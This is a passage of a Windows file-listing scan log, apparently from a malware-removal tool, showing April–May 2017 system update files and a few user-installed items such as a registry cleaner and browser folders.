2017-05-10 15:56 - 2017-04-28 03:09 - 00006144 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-security-base-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00005120 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-file-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-threadpool-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processthreads-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-sysinfo-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-synch-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localregistry-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localization-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-rtlsupport-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processenvironment-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-namedpipe-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-misc-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-memory-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-libraryloader-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-heap-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-xstate-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-util-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-string-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-profile-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-io-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-interlocked-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-handle-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-fibers-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-errorhandling-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-delayload-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-debug-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-datetime-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-console-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 02:36 - 04000488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntkrnlpa.exe
2017-05-10 15:56 - 2017-04-28 02:36 - 03945192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntoskrnl.exe
2017-05-10 15:56 - 2017-04-28 02:34 - 01314112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntdll.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 01114112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kernel32.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00690688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\adtschema.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00666112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpcrt4.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00644096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\advapi32.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00553472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00342528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\certcli.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00275456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KernelBase.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00261120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msv1_0.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00254464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schannel.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00223232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ncrypt.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00172032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wdigest.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00146432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msaudite.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00141312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpchttp.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00096768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sspicli.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00082944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\bcrypt.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msobjs.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00050688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\appidapi.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\srclient.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00022016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\secur32.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\apisetschema.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00005120 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-file-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00005120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wow32.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processthreads-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-sysinfo-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-synch-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-misc-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localregistry-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localization-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processenvironment-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-memory-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-libraryloader-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-heap-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-string-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-rtlsupport-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-profile-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-io-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-handle-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-fibers-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-errorhandling-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-delayload-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-debug-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-datetime-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-console-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 02:19 - 00148480 _____ (Microsoft Corporation) C:\Windows\system32\appidpolicyconverter.exe
2017-05-10 15:56 - 2017-04-28 02:19 - 00062464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\appid.sys
2017-05-10 15:56 - 2017-04-28 02:19 - 00017920 _____ (Microsoft Corporation) C:\Windows\system32\appidcertstorecheck.exe
2017-05-10 15:56 - 2017-04-28 02:18 - 00064000 _____ (Microsoft Corporation) C:\Windows\system32\auditpol.exe
2017-05-10 15:56 - 2017-04-28 02:15 - 00338432 _____ (Microsoft Corporation) C:\Windows\system32\conhost.exe
2017-05-10 15:56 - 2017-04-28 02:14 - 00296960 _____ (Microsoft Corporation) C:\Windows\system32\rstrui.exe
2017-05-10 15:56 - 2017-04-28 02:12 - 00159744 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb.sys
2017-05-10 15:56 - 2017-04-28 02:11 - 00291328 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb10.sys
2017-05-10 15:56 - 2017-04-28 02:11 - 00129536 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb20.sys
2017-05-10 15:56 - 2017-04-28 02:11 - 00050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\auditpol.exe
2017-05-10 15:56 - 2017-04-28 02:10 - 00112640 _____ (Microsoft Corporation) C:\Windows\system32\smss.exe
2017-05-10 15:56 - 2017-04-28 02:10 - 00030720 _____ (Microsoft Corporation) C:\Windows\system32\lsass.exe
2017-05-10 15:56 - 2017-04-28 02:08 - 00025600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\setup16.exe
2017-05-10 15:56 - 2017-04-28 02:08 - 00014336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntvdm64.dll
2017-05-10 15:56 - 2017-04-28 02:08 - 00007680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\instnm.exe
2017-05-10 15:56 - 2017-04-28 02:08 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\user.exe
2017-05-10 15:56 - 2017-04-28 02:07 - 00036352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptbase.dll
2017-05-10 15:56 - 2017-04-28 02:07 - 00006144 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-security-base-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 02:07 - 00004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-threadpool-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 02:07 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-xstate-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 02:07 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-util-l1-1-0.dll
2017-05-10 15:56 - 2017-04-26 16:59 - 03220992 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2017-05-10 15:56 - 2017-04-21 17:34 - 01133568 _____ (Microsoft Corporation) C:\Windows\system32\cdosys.dll
2017-05-10 15:56 - 2017-04-21 17:15 - 00805376 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cdosys.dll
2017-05-10 15:56 - 2017-04-20 02:00 - 00394448 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2017-05-10 15:56 - 2017-04-20 01:16 - 00346320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2017-05-10 15:56 - 2017-04-17 17:37 - 02065408 _____ (Microsoft Corporation) C:\Windows\system32\ole32.dll
2017-05-10 15:56 - 2017-04-17 17:37 - 00876544 _____ (Microsoft Corporation) C:\Windows\system32\oleaut32.dll
2017-05-10 15:56 - 2017-04-17 17:37 - 00512000 _____ (Microsoft Corporation) C:\Windows\system32\rpcss.dll
2017-05-10 15:56 - 2017-04-17 17:37 - 00026112 _____ (Microsoft Corporation) C:\Windows\system32\oleres.dll
2017-05-10 15:56 - 2017-04-17 17:37 - 00008704 _____ (Microsoft Corporation) C:\Windows\system32\comcat.dll
2017-05-10 15:56 - 2017-04-17 17:12 - 01417728 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ole32.dll
2017-05-10 15:56 - 2017-04-17 17:12 - 00581632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\oleaut32.dll
2017-05-10 15:56 - 2017-04-17 17:12 - 00026112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\oleres.dll
2017-05-10 15:56 - 2017-04-17 16:54 - 00007168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\comcat.dll
2017-05-10 15:56 - 2017-04-16 11:17 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2017-05-10 15:56 - 2017-04-16 11:16 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2017-05-10 15:56 - 2017-04-16 10:57 - 00066560 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2017-05-10 15:56 - 2017-04-16 10:55 - 00417792 _____ (Microsoft Corporation) C:\Windows\system32\html.iec
2017-05-10 15:56 - 2017-04-16 10:55 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2017-05-10 15:56 - 2017-04-16 10:54 - 00576512 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2017-05-10 15:56 - 2017-04-16 10:54 - 00088064 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2017-05-10 15:56 - 2017-04-16 10:51 - 02899456 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2017-05-10 15:56 - 2017-04-16 10:44 - 00054784 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2017-05-10 15:56 - 2017-04-16 10:43 - 00034304 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2017-05-10 15:56 - 2017-04-16 10:38 - 00615936 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2017-05-10 15:56 - 2017-04-16 10:37 - 00144384 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2017-05-10 15:56 - 2017-04-16 10:37 - 00116224 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2017-05-10 15:56 - 2017-04-16 10:36 - 00817664 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2017-05-10 15:56 - 2017-04-16 10:36 - 00814080 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2017-05-10 15:56 - 2017-04-16 10:35 - 25741312 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2017-05-10 15:56 - 2017-04-16 10:25 - 00968704 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2017-05-10 15:56 - 2017-04-16 10:21 - 00489984 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2017-05-10 15:56 - 2017-04-16 10:19 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2017-05-10 15:56 - 2017-04-16 10:18 - 05977600 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2017-05-10 15:56 - 2017-04-16 10:11 - 00077824 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2017-05-10 15:56 - 2017-04-16 10:10 - 00087552 _____ (Microsoft Corporation) C:\Windows\system32\tdc.ocx
2017-05-10 15:56 - 2017-04-16 10:09 - 00107520 _____ (Microsoft Corporation) C:\Windows\system32\inseng.dll
2017-05-10 15:56 - 2017-04-16 10:04 - 00199680 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2017-05-10 15:56 - 2017-04-16 10:03 - 00092160 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2017-05-10 15:56 - 2017-04-16 10:02 - 00062464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
2017-05-10 15:56 - 2017-04-16 10:01 - 00499200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2017-05-10 15:56 - 2017-04-16 10:01 - 00341504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\html.iec
2017-05-10 15:56 - 2017-04-16 10:01 - 00047616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll
2017-05-10 15:56 - 2017-04-16 10:00 - 00315392 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2017-05-10 15:56 - 2017-04-16 10:00 - 00064000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
2017-05-10 15:56 - 2017-04-16 09:57 - 00152064 _____ (Microsoft Corporation) C:\Windows\system32\occache.dll
2017-05-10 15:56 - 2017-04-16 09:53 - 02290176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2017-05-10 15:56 - 2017-04-16 09:52 - 00047104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2017-05-10 15:56 - 2017-04-16 09:52 - 00030720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
2017-05-10 15:56 - 2017-04-16 09:49 - 20278272 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2017-05-10 15:56 - 2017-04-16 09:48 - 00476160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2017-05-10 15:56 - 2017-04-16 09:47 - 00663552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2017-05-10 15:56 - 2017-04-16 09:47 - 00115712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2017-05-10 15:56 - 2017-04-16 09:46 - 00620032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
2017-05-10 15:56 - 2017-04-16 09:43 - 00262144 _____ (Microsoft Corporation) C:\Windows\system32\webcheck.dll
2017-05-10 15:56 - 2017-04-16 09:40 - 00806912 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2017-05-10 15:56 - 2017-04-16 09:40 - 00725504 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2017-05-10 15:56 - 2017-04-16 09:37 - 02132992 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2017-05-10 15:56 - 2017-04-16 09:37 - 01359360 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2017-05-10 15:56 - 2017-04-16 09:35 - 00416256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2017-05-10 15:56 - 2017-04-16 09:30 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll
2017-05-10 15:56 - 2017-04-16 09:29 - 00073216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tdc.ocx
2017-05-10 15:56 - 2017-04-16 09:28 - 00091136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inseng.dll
2017-05-10 15:56 - 2017-04-16 09:25 - 00168960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll
2017-05-10 15:56 - 2017-04-16 09:24 - 00076288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2017-05-10 15:56 - 2017-04-16 09:22 - 00279040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2017-05-10 15:56 - 2017-04-16 09:20 - 00130048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\occache.dll
2017-05-10 15:56 - 2017-04-16 09:12 - 00230400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\webcheck.dll
2017-05-10 15:56 - 2017-04-16 09:10 - 15250944 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2017-05-10 15:56 - 2017-04-16 09:10 - 00693248 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2017-05-10 15:56 - 2017-04-16 09:08 - 04548608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2017-05-10 15:56 - 2017-04-16 09:08 - 02057216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2017-05-10 15:56 - 2017-04-16 09:08 - 01155072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll
2017-05-10 15:56 - 2017-04-16 09:04 - 03241472 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2017-05-10 15:56 - 2017-04-16 08:53 - 13661184 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2017-05-10 15:56 - 2017-04-16 08:50 - 01544704 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2017-05-10 15:56 - 2017-04-16 08:40 - 00800768 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2017-05-10 15:56 - 2017-04-16 08:37 - 02767872 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2017-05-10 15:56 - 2017-04-16 08:34 - 01314816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2017-05-10 15:56 - 2017-04-16 08:34 - 00710144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2017-05-10 15:56 - 2017-04-12 17:32 - 01483776 _____ (Microsoft Corporation) C:\Windows\system32\crypt32.dll
2017-05-10 15:56 - 2017-04-12 17:32 - 00229376 _____ (Microsoft Corporation) C:\Windows\system32\wintrust.dll
2017-05-10 15:56 - 2017-04-12 17:32 - 00190976 _____ (Microsoft Corporation) C:\Windows\system32\cryptsvc.dll
2017-05-10 15:56 - 2017-04-12 17:32 - 00141824 _____ (Microsoft Corporation) C:\Windows\system32\cryptnet.dll
2017-05-10 15:56 - 2017-04-12 17:26 - 00179200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wintrust.dll
2017-05-10 15:56 - 2017-04-12 17:25 - 01176064 _____ (Microsoft Corporation) C:\Windows\SysWOW64\crypt32.dll
2017-05-10 15:56 - 2017-04-12 17:25 - 00145920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptsvc.dll
2017-05-10 15:56 - 2017-04-12 17:25 - 00106496 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptnet.dll
2017-05-10 15:56 - 2017-04-07 17:34 - 00986856 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dxgkrnl.sys
2017-05-10 15:56 - 2017-04-07 17:34 - 00265448 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dxgmms1.sys
2017-05-10 15:56 - 2017-04-07 17:30 - 00405504 _____ (Microsoft Corporation) C:\Windows\system32\gdi32.dll
2017-05-10 15:56 - 2017-04-07 17:30 - 00144384 _____ (Microsoft Corporation) C:\Windows\system32\cdd.dll
2017-05-10 15:56 - 2017-04-07 17:22 - 00312832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\gdi32.dll
2017-05-10 15:56 - 2017-04-05 16:55 - 00460800 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv.sys
2017-05-10 15:56 - 2017-04-05 16:55 - 00405504 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv2.sys
2017-05-10 15:56 - 2017-04-05 16:55 - 00168960 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srvnet.sys
2017-05-10 15:56 - 2017-04-04 17:34 - 01895656 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tcpip.sys
2017-05-10 15:56 - 2017-04-04 17:34 - 00377576 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\netio.sys
2017-05-10 15:56 - 2017-04-04 17:34 - 00287976 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\FWPKCLNT.SYS
2017-05-10 15:56 - 2017-04-04 16:53 - 00496128 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\afd.sys
2017-05-10 15:56 - 2017-04-04 16:53 - 00117760 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tdx.sys
2017-05-10 15:56 - 2017-03-10 18:32 - 01389056 _____ (Microsoft Corporation) C:\Windows\system32\pla.dll
2017-05-10 15:56 - 2017-03-10 18:32 - 00300544 _____ (Microsoft Corporation) C:\Windows\system32\pdh.dll
2017-05-10 15:56 - 2017-03-10 18:20 - 01508352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\pla.dll
2017-05-10 15:56 - 2017-03-10 18:20 - 00237056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\pdh.dll
2017-05-10 15:56 - 2017-03-10 17:57 - 00009216 _____ (Microsoft Corporation) C:\Windows\system32\plasrv.exe
2017-05-10 15:56 - 2017-03-10 17:55 - 00205312 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\fastfat.sys
2017-05-10 15:56 - 2017-03-10 17:55 - 00195584 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\exfat.sys
2017-05-10 15:56 - 2017-03-09 18:34 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\tzres.dll
2017-05-10 15:56 - 2017-03-09 18:19 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tzres.dll
2017-05-03 14:36 - 2017-05-03 14:36 - 00000000 ____D C:\Program Files (x86)\IIS
2017-05-03 14:35 - 2017-05-03 14:35 - 00000000 _____ C:\Windows\SysWOW64\1111111
2017-05-01 09:36 - 2009-06-10 23:00 - 00000824 _____ C:\Windows\system32\Drivers\etc\hosts.20170501-093603.backup
2017-04-29 16:43 - 2017-04-29 16:43 - 00001059 _____ C:\Users\Markus\Desktop\Eusing Free Registry Cleaner.lnk
2017-04-29 16:43 - 2017-04-29 16:43 - 00000000 ____D C:\Users\Markus\AppData\Roaming\Eusing
2017-04-29 16:43 - 2017-04-29 16:43 - 00000000 ____D C:\Program Files (x86)\Eusing Free Registry Cleaner
2017-04-29 16:42 - 2017-04-29 16:42 - 00985017 _____ C:\Users\Markus\Downloads\EFRCSetup_4.0.exe
2017-04-28 14:29 - 2017-05-17 14:18 - 00000000 ____D C:\Users\Public\Documents\Google
2017-04-27 19:44 - 2017-05-21 19:34 - 00000000 ____D C:\Users\Markus\AppData\LocalLow\Mozilla
2017-04-27 19:39 - 2017-05-25 21:45 - 00000000 ____D C:\Users\Markus\AppData\Roaming\Mozilla
